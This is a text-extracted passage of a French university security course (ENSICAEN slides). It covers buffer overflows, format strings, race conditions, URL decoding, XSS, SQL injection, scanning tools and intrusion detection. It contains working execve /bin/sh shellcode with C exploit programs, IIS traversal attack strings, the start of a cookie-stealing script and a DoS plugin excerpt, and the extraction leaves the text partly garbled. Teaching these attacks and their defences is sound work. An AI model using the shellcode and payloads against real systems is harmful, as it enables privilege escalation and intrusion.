Le buffer overflow va tre utilis pourprovoquer l'excution de /bin/sh, shell prsentdans toutes les distributions unix.

Gnration du code assembleur de lasquence: execve (argv[0],"/bin/sh",NULL)

Exemple code Linux x86:c h a r s h e llc o d e [] ="\xeb\x22\x5e\x89\xf3\x89\xf7\x83\xc7\x07\x31\xc0\xaa"

"\x89\xf9\x89\xf0\xab\x89\xfa\x31\xc0\xab\xb0\x08\x04"

"\x03\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xd9\xff"

"\x ff\x ff/b in /s h ";

28/09/2012 - ENSICAEN - (c) dp 108

Exemple BufferOverflow/Code Shell

char shellcode[] =

"\xeb\x22\x5e\x89\xf3\x89\xf7\x83\xc7\x07\x31\xc0\xaa"

"\x89\xf9\x89\xf0\xab\x89\xfa\x31\xc0\xab\xb0\x08\x04"

"\x03\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xd9\xff"

"\xff\xff/bin/sh";

char large_string [128] ;void main ()

{

char buffer [96] ;

int i ;

long *long_ptr = (long *) large_string ;

for (i = 0 ; i < 32 ; i++)

*(long_ptr + i) = (int) buffer ;

for (i = 0 ; i < strlen (shellcode) ; i++)

large_string [i] = shellcode [i] ;

strcpy (buffer,large_string) ;

}


55/139

55

28/09/2012 - ENSICAEN - (c) dp 109

ExempleBuffer/Overflow/Code Shell

shellcode

large_string (128)

buffer (96)

i (4)

long_ptr (4)

sfp (4)

ret (4)

strcpyoverflow

28/09/2012 - ENSICAEN - (c) dp 110

Stack Smashing Dans la ralit, les applications ne

comportent naturellement pas de squenceshell.

L'exploitation d'un "buffer overflow" ncessited'essaye de piger l'application avec la lignede commande, les variables d'environnementshell, les entres de donnes interactives,


56/139

56

28/09/2012 - ENSICAEN - (c) dp 111

Exemple dapplicationchar shellcode[] =

"\xeb\x22\x5e\x89\xf3\x89\xf7\x83\xc7\x07\x31\xc0\xaa\x89\xf9\x89\xf0\xab\x89\xfa\x31\xc0\xab\xb0\x08\x04\x03\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xd9\xff"\xff\xff/bin/sh";

void main (){

char buffer [128] ; int i ; long address = (long)&buffer ;for (i = 0 ; i < 128 ; i++) buffer [i] = 0x90 ;buffer [12] = address >> 0 & 0xff ; buffer [13] = address >> 8 & 0xff ;buffer [14] = address >> 16 & 0xff ; buffer [15] = address >> 24 & 0xff ;for (i = 0 ; i < strlen (shellcode) ; i++)

buffer [128 - strlen (shellcode) + i] = shellcode [i] ;execl ("/users/dp/bufferoverflow/demo","demo",buffer,0) ;

}

-rws--x--x 1 root root 11800 Sep 16 11:4 /users/dp/bufferoverflow/demo

28/09/2012 - ENSICAEN - (c) dp 112

Stack Smashing Prevention

Les fonctions de manipulation de chanes sans contrle de longueursont vulnrables.

Liste non exhaustive:

gets (str) fgets (stdin,str,10)

strcpy (str1,str2) strncpy (str1,str2,10)

strcat (str1,str2) strncat (str1,str2,10)

scanf ("%s",str) scanf ("%10s",str)


57/139

57

28/09/2012 - ENSICAEN - (c) dp 113

Stack Smashing Prevention

Utilisation de logiciels daudit de code source;Exemple: logiciel RATS (Rough Auditing Tool forSecurity)http://www.securesw.com/download_rats.htm/

La pile peut tre rendu non excutable: Patch linux:http://www.openwall.com/linux Solaris: ajout dans /etc/system:

set noexec_user_stack=1

set noexec_user_stack_log=1 Certains compilateurs peuvent mettre un repre

("canary") devant l'adresse de retour afin de laprotger (stackguard driv de gcc).

28/09/2012 - ENSICAEN - (c) dp 114

Exemple stackguard

buffer

sfp

retcanary

En cas dattaque

on crase lebuffer, canaryetret

avant le retour de la fonction,

le programme vrifie le

contenu de canary et dtecte

lintrusion

Le canary doit tre gnr

alatoirement.


58/139

58

28/09/2012 - ENSICAEN - (c) dp 115

Exemple de vulnrabilit

28/09/2012 - ENSICAEN - (c) dp 116

Chanes de format

Problme connu depuis juin 1999 et exploitdepuis juin 2000.

Leur exploitation ont conduit desvulnrabilits "remote root" (wu-ftpd, linuxtpc.statd, ) et "local root" (OpenBSD fstat,)

De nombreuses vulnrabilits sontprobablement encore venir.


59/139

59

28/09/2012 - ENSICAEN - (c) dp 117

Fonctions C de formatage

Exemples de telles fonctions: toute la familledes fonctionsprintf, syslog.

Fonctions acceptant un nombre variable deparamtres dont l'un est une chane deformat.

Les variables affiches sont converties enune reprsentation affichable etcomprhensible par l'homme.

28/09/2012 - ENSICAEN - (c) dp 118

Fonctionnement d'un printf

printf ("les nombres valent %d %d\n",a,b);

2 particularits dans les fonctions de lafamille printf: printf ("%s%n\n",chaine,&count); printf (chaine) ;

b

a

chane de format


60/139

60

28/09/2012 - ENSICAEN - (c) dp 119

Exploitation d'une chane deformat Modification de la valeur de la variable target:

#include

main (int argc,char **argv)

{

char inbuf[100];

char outbuf [100] ;

int target = 33 ;

memset (inbuf,'\0',100) ;

memset (outbuf,'\0',100) ;

read (0,inbuf,100) ;

sprintf (outbuf,inbuf) ;

printf ("%s",outbuf) ;

printf ("target = %d\n",target) ;

}

28/09/2012 - ENSICAEN - (c) dp 120

Format String + BufferOverflow

Exemple: vulnrabilit de qpop 2.53#include

void fonction (char *user)

{

char outbuf [512] ;char buffer [512] ;

sprintf (buffer,"ERR Wrong command: %400s",user) ;

sprintf (outbuf,buffer) ;

}

void main ()

{

char user [128] ;

read (0,user,sizeof (user)) ;

fonction (user) ;

}


61/139

61

28/09/2012 - ENSICAEN - (c) dp 121

Vulnrabilit qpop 2.53

Objectif: faire dborder outbuf sur l'adressede retour; celle ci pointera sur user.

user:["Shell code" "%97c" "Adresse de user]buffer: aprs le 1er sprintf["Err Wrong Command : "" Shell code%97cAdresse de user]

----------20---------------------------------400----------------Le 2me sprintf interprte le %97c; il fait

dborder outbuf.

28/09/2012 - ENSICAEN - (c) dp 122



62/139

62

28/09/2012 - ENSICAEN - (c) dp 123

Race Condition Toute ressource (fichiers, structure de

donnes, ) peut tre manipulesimultanment par plusieurs processus ouplusieurs threads.

Certaines oprations doivent donc trerendues atomiques.

Les droits d'accs doivent tre trs prcis.

Exemple: quel est danger du programme surle transparent suivant, sachant quel'excutable appartient "root" et possde leSetUser ID (bit s) ?

28/09/2012 - ENSICAEN - (c) dp 124

Race Condition#include

#include

#include

#include

#include

int main (int argc,char **argv)

{

struct stat st ;

FILE *fp ;if (argc != 3)

{ fprintf (stderr,"usage : %s fichier message\n", argv [0]) ; exit (EXIT_FAILURE) ;}

if (stat (argv [1], &st) < 0)

{fprintf (stderr,"%s introuvable\n",argv [1]) ;exit (EXIT_FAILURE) ;}

if (st.st_uid != getuid ())

{fprintf (stderr,"%s ne vous appartient pas !\n", argv [1]) ;exit (EXIT_FAILURE) ;}

if (! S_ISREG (st.st_mode))

{fprintf (stderr,"%s n'est pas un fichier normal\n", argv [1]) ;exit (EXIT_FAILURE) ;}

if ( (fp = fopen (argv [1],"w")) == NULL)

{fprintf (stderr,"Ouverture impossible\n") ;exit (EXIT_FAILURE) ;}

fprintf (fp,"%s\n",argv [2]) ;fclose (fp) ;fprintf (stderr,"Ecriture OK\n") ;

exit (EXIT_SUCCESS) ;

}


63/139

63

28/09/2012 - ENSICAEN - (c) dp 125

Fonctions utiliser

Il faut conserver la totale matrise d'un fichier lors desa manipulation d'un fichier.

Quelques exemples de fonctions utilisables:

int open (pathname,flag,mode) Ouverture d'un fichier. Renvoieun descripteur

fstat (inf fd,struct stat *st) Informations sur un fichier

FILE *fdopen (int fd,char *mode) Obtenir un flux partir d'undescripteur dj ouvert

28/09/2012 - ENSICAEN - (c) dp 126

Fichiers temporaires

Les applications crent des fichierstemporaires dans /tmp

drwxrwxrwt 6 root root 1024 Sep 29 15:01

/tmp Problme quand le nom du fichier temporaire est

prvisible et cr par une application root suid:

Cration d'un lien symbolique entre ce fichier et unfichier systme critique (/etc/shadow par exemple)

L'application doit tre ensuite tue pour qu'elle nepuisse effacer son fichier temporaire.


64/139

64

28/09/2012 - ENSICAEN - (c) dp 127

Exemple programme erron

#include

void main ()

{

FILE *fp ;

char chaine [80] ;

memset (chaine,'\0',sizeof (chaine)) ;

if ( (fp = fopen ("/tmp/stupide","w")) == NULL) { exit (1) ; }

read (0,chaine,sizeof (chaine)) ;fprintf (fp,"%s",chaine) ;

fclose (fp) ;}

28/09/2012 - ENSICAEN - (c) dp 128

Fichiers temporaires Cration d'un rpertoire dans un rpertoire

disposant d'un bit "t" (sticky bit): Nom de fichier alatoire.

Fichier ouvert avec les droits O_CREAT|O_EXCL(attention aux disques NFS avec O_EXCL).

La fonctiontmpfile (3)cre un fichiertemporaire dans le rpertoire spcifi par lavariableP_tmpdirde stdio.h. Mais pas deprcision sur les droits d'accs.

Utiliser pluttmkstemp (3)en conjonction avecumask (2).


65/139

65

28/09/2012 - ENSICAEN - (c) dp 129

Cration d'un fichiertemporaire#include FILE *create_tempfile (char *temp_filename_pattern){

int temp_fd,old_mode ;FILE *tmp ;old_mode = umask (077) ;temp_fd = mkstemp (temp_filename_pattern) ;umask (old_mode) ;if (temp_fd == -1) { exit (1); }if ( ! (tmp = fdopen (temp_fd,"w+b"))) { exit (1) ; }return tmp ;

}void main (){

char pattern [ ] = "/tmp/demoXXXXXX" ;create_tempfile (pattern) ;unlink (pattern) ; /* Effacement */

}

28/09/2012 - ENSICAEN - (c) dp 130



66/139

66

28/09/2012 - ENSICAEN - (c) dp 131

Erreurs de dcodage d'URL

Certains caractres doivent tre "chapps";par exemple le passage de paramtres unCGI, les caractres encods sur plusieursoctets.

Caractre chapp: %XX o XX est le codehexadcimal du caractre encoder.

Exemple:nick=test+param%E8tre&channel=France

Des serveurs webs peuvent ne pas dcoderde manire propre.

28/09/2012 - ENSICAEN - (c) dp 132

Erreur de dcodage d'URL

Un serveur web est amen prendre une dcision en fonctiond'une URL:

Le chemin indiqu ne doit pas sortir de la racine du serveurWEB

L'extension du fichier dcide du handler activer (.cgi, .jsp,); un fichier se terminant par.jsp%00.htmlpeut treconsidr comme un fichier html par les mcanismes descurit mais excut comme du code java (Java ServerPage).

L'utilisateur doit avoir les permissions adquates pouraccder au fichier ou rpertoire indiqu.

Beaucoup de serveurs web effectuent des tests de scuritavant le dcodage et non aprs.


67/139

67

28/09/2012 - ENSICAEN - (c) dp 133

Etude de cas Microsoft IIS 4.0 et 5.0 tait vulnrable au problme: "MS

IIS/PWS Escaped Characters Decoding Command ExecutionVulnrability".

Dtail surhttp://www.securityfocus.com/cgi-bin/vulns-item.pl?section=discussion&id=2708

Correctif surhttp://www.microsoft.com/technet/security/bulletin/MS01-026.asp

Chaque requte subit le traitement suivant:

dcodage. test de scurit. si le test de scurit est valid, dcodage

nouveau avant utilisation.

28/09/2012 - ENSICAEN - (c) dp 134

IIS : Etude de cas

On tente d'excuter une commande sur lesystme distant: besoin de transmettre lachane ..\..

Codage: ..%5c.. Echec

Double codage: ..%255c.. Succs

Plusieurs exploits disponibles, par exempleexeciis.c par Filip Maertens,[email protected]

IIS souffre aussi de la vulnrabilit "NT IISMDAC RDS vulnerabilit (BugTraq ID 529).


68/139

68

28/09/2012 - ENSICAEN - (c) dp 135

Exemples d'attaque

Donnes extraites du fichier de log dehttp://www.ensicaen.fr

host-213-191-162-202.warsun.com - - [27/Aug/2004:07:42:22 +0200] "GET/scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 -

195.224.89.179 - - [28/Aug/2004:14:17:43 +0200] "GET/scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 -

artemisa.escet.urjc.es - - [05/Sep/2004:20:17:35 +0200] "GET/scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 -

195.167.240.188 - - [08/Sep/2004:03:53:14 +0200] "GET/scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 -

128.192.164.95 - - [10/Sep/2004:02:46:42 +0200] "GET/scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 -

28/09/2012 - ENSICAEN - (c) dp 136

Exemple de mauvais dcodaged'URL

Vulnrabilit dcouverte en juillet 2007(CVE-2007-3845, BID-24837).

Concerne Firefox sous Windows XPavec Internet Explorer 7 install

Mauvaise gestion du caractre spcial"%00" dans les chanes formant les URI(Uniform Ressource Identifier)


69/139

69

28/09/2012 - ENSICAEN - (c) dp 137

Exemple de mauvais dcodaged'URLEnvoyer votre courrier [email protected]

28/09/2012 - ENSICAEN - (c) dp 138

Le cross site scripting

Attaque connue depuis fvrier 2000: http://www.cert.org/advisories/CA-2000-02.html

Pourquoi ce nom :

Attaque base sur lexcution de scripts dans lenavigateur de la victime (javascript, vbscript, ). La victime passe dun site lautre sans sen

apercevoir. Lacronyme XSS:

CSS : Cascading Style Sheet XSS : Cross Site Scripting (excution croise de

code).


70/139

70

28/09/2012 - ENSICAEN - (c) dp 139

Intrt de XSS

http est un protocole sans notion de session: pas delien entre les requtes reues par le serveur.

Une session doit tre construite artificiellement:

Par un cookie envoy au navigateur

Par manipulation dURL contenant un identifiant

Par des paramtres dun programme Etc.

28/09/2012 - ENSICAEN - (c) dp 140

Exemple dattaque

Herv Schauer Consultants http://www.hsc.fr


71/139

71

28/09/2012 - ENSICAEN - (c) dp 141

Comment dtourner le cookie

Le client a consult un site pirate. Le client a reu un courrier lectronique

contenant un lien vers un site pirate. Le serveur consult a t pirat et contient un

lien vers le site pirate. Un code malveillant pointant vers le site

pirate a t insr dans les saisies du client. Etc.

28/09/2012 - ENSICAEN - (c) dp 142

Exemple de mise en oeuvre

Une vulnrabilit XSS est dtecte sur le sitewww.vulnerable.com

Un utilisateur clique sur un lien (reu par courriel,

trouv sur un livre dor, ):

cliquer ici pour recevoir 50 euros

Nom dun champ duformulaire


72/139

72

28/09/2012 - ENSICAEN - (c) dp 143

Script steal.cgi #!/usr/bin/perl

# steal.cgi by David Endler [email protected]# Specific to your system$mailprog = '/usr/sbin/sendmail';# create a log file of cookies, well also email them tooopen(COOKIES,>>stolen_cookie_file);# what the victim sees, customize as neededprint "Content-type:text/html\n\n";print

fichiertest1_xss.php3


73/139

73

28/09/2012 - ENSICAEN - (c) dp 145

Remde possible

Ne jamais faire confiance une saisieutilisateur.

Ne jamais afficher lcran tel quel unesaisie utilisateur.

Filtrer tous les caractres indsirables

(comme les caractres < et >). Exemple en php:

print htmlspecialchars ("Bonjour $nom") ;

28/09/2012 - ENSICAEN - (c) dp 146

Lauthentification .htaccess

Systme dauthentification frquemmentutilis pour restreindre laccs au contenu derpertoires spcifiques.

Filtre par domaine, mcanisme login/mot depasse.

Fichier .htaccess par dfaut.


74/139

74

28/09/2012 - ENSICAEN - (c) dp 147

Exemple de connexion

28/09/2012 - ENSICAEN - (c) dp 148

Ecoute de la phase deconnexion

Mot de passe uuencode


75/139

75

28/09/2012 - ENSICAEN - (c) dp 149

Injection SQL

Beaucoup d'applications web s'appuientsur des bases de donnes.

Les requtes SQL utilisent desinformations saisies par les utilisateurs.

Les informations doivent tre traitesavant utilisation.

28/09/2012 - ENSICAEN - (c) dp 150

Injection SQL

SELECT login FROM users WHERE login = '$login' AND password='$password'

Quel risque si les valeurs du formulaire sont utilises sansvrification ?


76/139

76

28/09/2012 - ENSICAEN - (c) dp 151

Scurit des

systmes

28/09/2012 - ENSICAEN - (c) dp 152

Disponibilit

Plusieurs ordinateurs peuvent tre regroups engrappe (cluster) pour tre visibles comme un seulordinateur et permettre:

D'augmenter la disponibilit De mieux rpartir la charge Permettre la monte en charge

Exemples:xgrid (apple), cluster linux, windows server,


77/139

77

28/09/2012 - ENSICAEN - (c) dp 153

Virtualisation Ensemble des technologies matrielles et/ou logicielles qui permettent de faire

fonctionner sur une seule machine plusieurs systmes d'exploitation et/ouplusieurs applications, sparment les uns des autres, comme s'ilsfonctionnaient sur des machines physiques distinctes.

Quelques avantages:

Optimiser l'usage des ressources d'une machine tout en isolant les services entre eux. Optimisation du taux dutilisation des ressources informatiques Economie dnergie ( green computing ) Gain conomique et dencombrement Possibilit de cloner et/ou de dplacer des machines

Quelques risques Une panne ou une indisponibilit dune ressource commune peut bloquer tous les

services hbergs. En fonction de la solution virtualisation, un manque de cloisonnement peut engendrer

une fuite dinformations. Risque de copie non souhaite de machine virtuelle

28/09/2012 - ENSICAEN - (c) dp 154

Logiciels de virtualisation

vmwarehttp://www.vmware.com

Citrix Xen Serverhttp://www.citrix.com

Vserver

http://www.linux-vserver.org

Virtualbox: virtualisation du poste de travailhttp://www.virtualbox.org/


78/139

78

28/09/2012 - ENSICAEN - (c) dp 155

Les outils

d'attaques/dfenses

28/09/2012 - ENSICAEN - (c) dp 156

Beaucoup d'outils disponibles

Visite de G. Bush la NSA en janvier 2006

outils de scurit


79/139

79

28/09/2012 - ENSICAEN - (c) dp 157

Anatomie d'une attaque

Rcolte d'informations sur une ciblepotentielle.

Interrogation des bases whois.

Utilisation de moteurs de recherche.

Analyse de la cible (cartographie,recherche des services ouverts et desvulnrabilits).

28/09/2012 - ENSICAEN - (c) dp 158

Cartographie du rseau

Mthode standard peu efficace: ping (Packet Internet Groper). Outils plus sophistiqus:

Pinger http://www.nmrc. org/fil es/snt/ fping http://www.fping.com hping3 http://www.hping.org

- Test firewall rules- Advanced port scanning- Test net performance using different protocols,

packet size, TOS (type of service) and

fragmentation.- Path MTU discovery- Transferring files between even really fascist

firewall rules.- Traceroute-like under different protocols.- Firewalk-like usage.- Remote OS fingerprinting.- TCP/IP stack auditing.- A lot of others.


80/139

80

28/09/2012 - ENSICAEN - (c) dp 159

Cartographie du rseau

Le DNS d'un site centralise toutes lesmachines connectes au rseau.

Certains DNS incorrectementconfigurs peuvent autoriser destransferts de zones:

dig @ns.domaine.com domaine.com axfr

28/09/2012 - ENSICAEN - (c) dp 160

Recherche des servicesouverts

Recherche des services ouverts un instant donn.

Utilisation d'un scanner de ports

Envoi d'un paquet (TCP,UDP,ICMP) sur une cible etanalyse du rsultat; suivant les cas on pourradterminer l'tat d'un port (ouvert,ferm, filtr).

Beaucoup de logiciels disponibles:Unix: nmap, jakal, IdentTCPscanWindows: ISS,YAPS


81/139

81

28/09/2012 - ENSICAEN - (c) dp 161

nmap

Outil de rfrence.

nmap sous unix (http://www.nmap.org)

Scanne une machine ou un rseau la recherchedes services ouverts et de son identit.

Supporte de nombreuses techniques de scan:

28/09/2012 - ENSICAEN - (c) dp 162

nmap: techniques de scan

vanilla TCP connect () (-sT, dfaut) TCP SYN (half open) (-sS) TCP FIN (stealth) (-sF)

Xmas scan (-sX) Null scan (-sN) TCP ftp proxy (bounce attack) (-b server) SYN/FIN using IP fragments (-f) UDP recvfrom () (-sU) RPC scan (-sR) Reverse-ident (-I)


82/139

82

28/09/2012 - ENSICAEN - (c) dp 163

nmap Beaucoup de fonctionnalits prsentes dans nmap:

Scan Sans envoi de trame ICMP (-P0) Scan en mode verbeux (-v v) Impose le port source (-g port) FingerPrinting: Remote OS detection (-O) decoy scanning (-Ddecoy_host1,decoy2[,...]) Timing policy (-T


83/139

83

28/09/2012 - ENSICAEN - (c) dp 165

Scan Spoof

hping permet de scanner une machineen usurpant l'identit d'une autre:

scanner

rebond(machine

peu active)

cible

hping r rebond

SYN, port,source=rebond

RST si portferm SYN-ACK

RST si portouvert

28/09/2012 - ENSICAEN - (c) dp 166

FingerPrinting passif

FingerPrinting est dit passif quand iln'met aucune information:

Analyse des trames envoyes par unemachine distante.

Analyse d'un fichier de log.

Exemple: p0f http://www.stearns.org/p0f


84/139

84

28/09/2012 - ENSICAEN - (c) dp 167

Association port-processus

Comment trouver localement quel processusest en coute sur un port: Unix

netstat anp (sur les versions rcentes d'unix)

commande plus gnrale: lsof (LiSt Opened Files)ftp://vic.cc.purdue.edu/pub/tools/unix/lsof

lsof i | grep LISTEN

Windows Active Ports

tcpview

28/09/2012 - ENSICAEN - (c) dp 168

Exemple Unix "lsof"

httpd 1053 root 16u IPv4 3262 TCP *:http (LISTEN)

httpd 1060 nobody 16u IPv4 3262 TCP *:http (LISTEN)



httpd 1063 nobody 16u IPv4 3262 TCP *:http (LISTEN)httpd 1064 nobody 16u IPv4 3262 TCP *:http (LISTEN)

sshd 1073 root 3u IPv4 3310 TCP *:ssh (LISTEN)

xinetd 1088 root 5u IPv4 3327 TCP *:pn-raproxy (LISTEN)

xinetd 1088 root 6u IPv4 3328 TCP *:telnet (LISTEN)



squid 14787 nobody 11u IPv4 13401405 TCP *:squid (LISTEN)



85/139

85

28/09/2012 - ENSICAEN - (c) dp 169

Exemple Windows

28/09/2012 - ENSICAEN - (c) dp 170

Recherche des versionsutilises

Les versions des services utilises donnent desindications sur les vulnrabilits potentielles.

Les versions peuvent parfois tre obtenues par un

simple telnet sur un port donn: Exemples:


86/139

86

28/09/2012 - ENSICAEN - (c) dp 171

Numro de version d'un serveurwebdp@debian-mx1:~$ telnet www.ensicaen.fr 80Trying 193.49.200.59...Connected to serv2.ensicaen.fr.Escape character is '^]'.quit501 Method Not ImplementedMethod Not Implementedquit to /index.html not supported.

Invalid method in request quit

Apache/1.3.26Server at www.ensicaen.fr Port 80Connection closed by foreign host.

Attention: le rsultat est-il garanti ?

28/09/2012 - ENSICAEN - (c) dp 172

Concept de faille

Une faille est une vulnrabilit permettant desattaquants d'obtenir un accs non autoris unsystme.

On peut trouver des vulnrabilits tous les niveaux: routeurs logiciels client/serveur systme d'exploitation firewalls


87/139

87

28/09/2012 - ENSICAEN - (c) dp 173

Vulnrabilits Des dizaines de vulnrabilits sont dcouvertes chaque semaine (environ 7000

failles publies sur Internet en 2011 et 26 millions de codes malveillantsdiffuss*)

Une vulnrabilit peut tre la consquence d'une ngligence (mot de passe nulou trivial par exemple) ou d'une erreur de programmation (buffer overflow, ).

Certaines vulnrabilits peuvent tre gardes secrtes ( des fins d'espionnage,d'utilisation mafieuse, ).

La dcouverte de nouvelles vulnrabilits peut faire l'objet de rmunration; onentre dans l're du "vulnerability business".

Certaines vulnrabilits peuvent tre divulgues immdiatement (0 day);phnomne dangereux et irresponsable.

Certains sites diffusent des exploits sans mentionner de correctifs.

* Source: rapport PandaLabs 2012

28/09/2012 - ENSICAEN - (c) dp 174

Vulnrabilits Un administrateur doit se tenir inform quotidiennement des dernires

vulnrabilits et avoir de la ractivit.

Beaucoup d'information en ligne: Sites officiels

CERT (Computer Emergency Response Team) Gouvernement franais:

Premier MinistreSGDN (Secrtaire Gnral de la Dfense Nationale)

ANSSI (Agence Nationale de la Scurit des SystmesdInformation)

COSSI (Centre Oprationnel de la scurit desSystmes dInformations)

CERTA (Centre d'Expertise deRponse et de Traitement des

Attaques)

Sites spcialiss Listes de diffusion: BugTraq

(http://www.securityfocus.com) et beaucoup d'autres


88/139

88

28/09/2012 - ENSICAEN - (c) dp 175

Correction des vulnrabilits

Correctifs (patches) sur les sites desconstructeurs (pas toujours immdiat).

Rcuprer les dernires versions desapplications dans le cas des logicielslibres.

28/09/2012 - ENSICAEN - (c) dp 176

Recherche des vulnrabilits

Un scanner est un programme qui dtecte lesfaiblesses de scurit d'une machine distante oulocale.

En interrogeant les ports TCP/IP, on peut dtecter: Les services excuts un moment prcis Les utilisateurs propritaires de ces services Si les connexions anonymes sont acceptes Si certains services rseaux ncessitent une

authentification etc.


89/139

89

28/09/2012 - ENSICAEN - (c) dp 177

Scanners Attention aux problmes lgaux et

thiques lors de l'utilisation descanners.

Les scanners laissent des traces dansles fichiers d'audit.

On trouve des scanners commerciauxet domaines public.

28/09/2012 - ENSICAEN - (c) dp 178

Scanners

Historiquement: SATAN (SecurityAdministrator's Tool for Analysing

Networks) distribu en avril 1995 parDan Farmer et Weitse Venema.

Quelques rfrences de scanners: nessus http://www.nessus.org

iss http://www.iss.net


90/139

90

28/09/2012 - ENSICAEN - (c) dp 179

Nessus: un outil de test descurit Tlchargeable sur :

http://www.nessus.org

Modle client/serveur:

Utilise des plug-in

Dispose un langage de programmation(NASL = Nessus Attack Scripting Language)

28/09/2012 - ENSICAEN - (c) dp 180

Nessus: suite

Gnre des rapports clairs etexportables.

Base de donnes des vulnrabilitsconnues remise jour rgulirement.

Etc.


91/139

91

28/09/2012 - ENSICAEN - (c) dp 181

Nessus: exemple de rsultat

28/09/2012 - ENSICAEN - (c) dp 182

Exemple plug-in: bonk.nasl(extrait)

start_denial();

PADDING = 0x1c;

FRG_CONST = 0x3;

sport = 123;

dport = 321;

addr = this_host();

ip = forge_ip_packet(ip_v : 4,ip_ hl : 5 ,

ip_len : 20 + 8 + PADDING,

ip_id : 0x455,

ip_p : IPPROTO_UDP,

ip_tos : 0,

ip_ttl : 0x40,

ip_off : IP_MF,

ip_src : addr);

udp1 = forge_udp_packet(ip : ip, uh_sport:sport,uh_dport:dport, uh_ulen : 8 + PADDING);

set_ip_elements(ip : ip, ip_off : FRG_CONST + 1,ip_len : 20 + FRG_CONST);

udp2 = forge_udp_packet(ip : ip,uh_sport : sport,

uh_dport : dport, uh_ulen : 8 + PADDING);

send_packet(udp1, udp2, pcap_active:FALSE) x500;

sleep(5);

alive = end_denial();

if(!alive){

set_kb_item(name:"Host/dead",value:TRUE);

security_hole(0, prototype:"udp");

}


92/139

92

28/09/2012 - ENSICAEN - (c) dp 183

Exploitation des vulnrabilits

Le compte rendu des scanners peut trecorrl avec les bases de donnesd'incidents pour obtenir l'exploitcorrespondant.

exemples:http://www.securityfocus.com (rfrencement BID)http://cve.mitre.org (rfrencement CVE)

28/09/2012 - ENSICAEN - (c) dp 184

IntrusionDetectionSystem

Bas sur: une approche comportementale: dfinition de

profils type d'utilisateur,

une approche par scnario: cration d'une basede donnes d'attaques, de signatures,

Un IDS ne doit pas gnrer trop de "faux positifs".

Surveillance sur le rseau: NIDS (Network IntrusionDetection System).


93/139

93

28/09/2012 - ENSICAEN - (c) dp 185

Snort: un exemple de NIDS

Network Intrusion Detection Software

Permet de dtecter les scanners et tentativesdintrusion

Tlchargeable sur http://www.snort.org

28/09/2012 - ENSICAEN - (c) dp 186

Snort: fonctionnalits

Dtection au niveau des protocolesIP TCP UDP ICMP

Dtection dactivits anormalesStealth scan, OS Finger Printingcode ICMP invalide

Prprocesseur pour la gestion des fragments,les sessions http,


94/139

94

28/09/2012 - ENSICAEN - (c) dp 187

Architecture de snort

libpcap

dcodage

Prprocesseur 1

Prprocesseur n

Dtection

plugins dedtection

Sortie 1

Sortie n

28/09/2012 - ENSICAEN - (c) dp 188

Snort: exemples de rgles

alert tcp $EXTERNAL_NET any -> $SQL_SERVERS 3306(msg:"MYSQL root login attempt"; flow:to_server,established;

content:"|0A 00 00 01 85 04 00 00 80 72 6F 6F 74 00|";classtype:protocol-command-decode; sid:1775; rev:1;)

alert tcp $EXTERNAL_NET any -> $SQL_SERVERS 3306(msg:"MYSQL show databases attempt";flow:to_server,established; content:"|0f 00 00 00 03|showdatabases"; classtype:protocol-command-decode; sid:1776;rev:1;)


95/139

95

28/09/2012 - ENSICAEN - (c) dp 189

Exemple de rsultat snort (avecipcop)

28/09/2012 - ENSICAEN - (c) dp 190

Exemple d'attaquant


96/139

96

28/09/2012 - ENSICAEN - (c) dp 191

IntrusionPreventionSystem Un IPS peut stopper un trafic jug

suspect.

Un logiciel peut se trouver sur unrouteur, sur un firewall ou sur un botierspcialis en rupture du rseau.

Exemples d'diteur d'IPS:Cisco, ISS, McAfee,

28/09/2012 - ENSICAEN - (c) dp 192

Mtrologie Les outils d'analyse de trafic et de mtrologie

permettent de dtecter l'utilisation anormale durseau et les pics de consommation (scan massif,).

Quelques exemples d'outils: extra (EXternal TRaffic Analyser)

http://lpsc.in2p3.fr/extra/

mrtg (Multi Router Traffic Grapher)http://www.mrtg.org

vigiloghttp://vigilog.ensmp.fr/


97/139

97

28/09/2012 - ENSICAEN - (c) dp 193

extra

Logiciel de monitoring du trafic rseau

Fonctions de base: Recueil des logs routeurs (IP source, IP

destination, Port source, Port destination, volume).

Stockage dans une base de donnes

Traitement systmatique sur les logs

Interface graphique d'analyse

28/09/2012 - ENSICAEN - (c) dp 194

INTERNET

RESEAU LOCAL

EXTRA

EXTRA BD

COLLECTEURSTART/STOP

LOGS

LOADROUTEUR

SNIFFER


98/139

98

28/09/2012 - ENSICAEN - (c) dp 195

Exemple de rsultat

28/09/2012 - ENSICAEN - (c) dp 196

mrtg

Utilisation de SNMP pour relever lescompteurs des priphriques (routeurs,

).

Cration de pages html en temps relscontenant des graphes reprsentant letrafic sur le rseau en cours desurveillance.


99/139

99

28/09/2012 - ENSICAEN - (c) dp 197

mrtg: exemple de rsultat

28/09/2012 - ENSICAEN - (c) dp 198

vigilog

Rediriger les violations d'ACL d'un routeur surle syslog d'une machine.

Traitement des logs par des scripts perl.

Courriel de synthse envoy l'administrateur.

Rapport sous forme de page html: adresses d'origine les plus actives. adresses de destination les plus actives. les ports les plus recherchs. etc.


100/139

100

28/09/2012 - ENSICAEN - (c) dp 199

Extrait d'une ACLensicaen> show access-lists 112

deny tcp any any eq sunrpc log (48501 matches)deny udp any any eq sunrpc log (54 matches)deny udp any any eq 135 log (545 matches)deny tcp any any eq 135 log (8717308 matches)deny tcp any any eq 136 log (19 matches)deny udp any any eq 136 logdeny tcp any any eq 139 log (3918461 matches)deny udp any any eq netbios-ss logdeny tcp any any eq 412 log (13 matches)deny udp any any eq 412 log

deny tcp any any eq 444 log (4539 matches)deny udp any any eq 444 logpermit ip any any (330007431 matches)permit udp any anypermit tcp any any

28/09/2012 - ENSICAEN - (c) dp 200

Vigilog: exemple de sortie

*** ACL 112 - Entree Site ***

Les adresses sources les plus actives :

112 200.31.197.180 536 lignes - mail.unad.edu.co

112 201.129.251.211 524 lignes - dsl-201-129-251-211.prod-infinitum.com.mx

112 61.33.21.2 484 lignes - 61.33.21.2112 222.149.121.109 416 lignes - p2109-ipbf208niho.hiroshima.ocn.ne.jp

